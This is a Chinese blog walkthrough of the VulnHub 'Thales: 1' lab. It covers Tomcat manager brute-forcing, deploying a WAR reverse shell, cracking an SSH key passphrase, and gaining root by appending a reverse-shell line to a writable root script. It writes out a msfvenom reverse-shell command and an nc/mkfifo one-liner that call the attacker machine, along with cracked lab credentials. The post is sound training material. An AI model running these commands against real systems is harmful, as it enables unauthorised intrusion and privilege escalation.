2022-08-30 08:41阅读: 152评论: 0推荐: 0

Thales: 1-vulnhub靶场

环境信息

靶机:192.168.124.150
攻击机:192.168.124.129

打靶过程

nmap 扫描端口及服务

image

发现开放了 22,8080 端口
访问 8080 是 apache tomcat 欢迎页面

image

目录扫描

目录扫描未发现扫描有用信息
image

tomcat 登录爆破

因为 tomcat 有管理登录页面,于是尝试爆破

image

image

成功爆破出 tomcat 账号密码为 tomcat:role1

上传 war 包反弹 shell

登录后,在 web 应用程序部署界面尝试在上传 war 包反弹 shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.124.129 LPORT=9999 -f war -o revshell.war

image

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹

image

image

发现 ssh 私钥

在 thales 家目录下发现了两个文件,user.txt 无访问权限,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh

image

image

image

并且在 thales 家目录下查看所有文件,发现了 ssh 私钥文件

image
image

爆破私钥得到密码

将私钥文件下载到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06

image

那么 su 到 thales 用户

image

发现了第一个 flag

image

提权

想到给我们的脚本还没用上,查看脚本,该脚本是 root 用户创建的,且我们有读、写、执行权限

image

image

于是插入反弹 shell 命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.124.129 6666 >/tmp/f" >> backup.sh

image

攻击机监听一会儿后成功反弹提权至 root

image

获取 flag

image

总结

1.tomcat 登录爆破
2.私钥爆破
3.脚本反弹 shell

posted @   r0ure  阅读(152)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起
  1. 1 404 not found REOL
  2. 2 ちるちる REOL
  3. 3 神様になった日 REOL
  4. 4 Lunatic REOL
  5. 5 サマーホラーパーティ REOL
  6. 6 サマーホラーパーティ REOL
  7. 7 Coincidance Handsome Dancer
404 not found - REOL
00:00 / 00:00
An audio error has occurred, player will skip forward in 2 seconds.

作曲 : Reol

作词 : Reol

fade away...do over again...

fade away...do over again...

歌い始めの一文字目 いつも迷ってる

歌い始めの一文字目 いつも迷ってる

どうせとりとめのないことだけど

伝わらなきゃもっと意味がない

どうしたってこんなに複雑なのに

どうしたってこんなに複雑なのに

噛み砕いてやらなきゃ伝わらない

ほら結局歌詞なんかどうだっていい

僕の音楽なんかこの世になくたっていいんだよ

Everybody don't know why.

Everybody don't know why.

Everybody don't know much.

僕は気にしない 君は気付かない

何処にももういないいない

Everybody don't know why.

Everybody don't know why.

Everybody don't know much.

忘れていく 忘れられていく

We don't know,We don't know.

目の前 広がる現実世界がまた歪んだ

目の前 広がる現実世界がまた歪んだ

何度リセットしても

僕は僕以外の誰かには生まれ変われない

「そんなの知ってるよ」

気になるあの子の噂話も

シニカル標的は次の速報

麻痺しちゃってるこっからエスケープ

麻痺しちゃってるこっからエスケープ

遠く遠くまで行けるよ

安定なんてない 不安定な世界

安定なんてない 不安定な世界

安定なんてない きっと明日には忘れるよ

fade away...do over again...

fade away...do over again...

そうだ世界はどこかがいつも嘘くさい

そうだ世界はどこかがいつも嘘くさい

綺麗事だけじゃ大事な人たちすら守れない

くだらない 僕らみんなどこか狂ってるみたい

本当のことなんか全部神様も知らない

Everybody don't know why.

Everybody don't know why.

Everybody don't know much.

僕は気にしない 君は気付かない

何処にももういないいない

Everybody don't know why.

Everybody don't know why.

Everybody don't know much.

忘れていく 忘れられていく

We don't know,We don't know.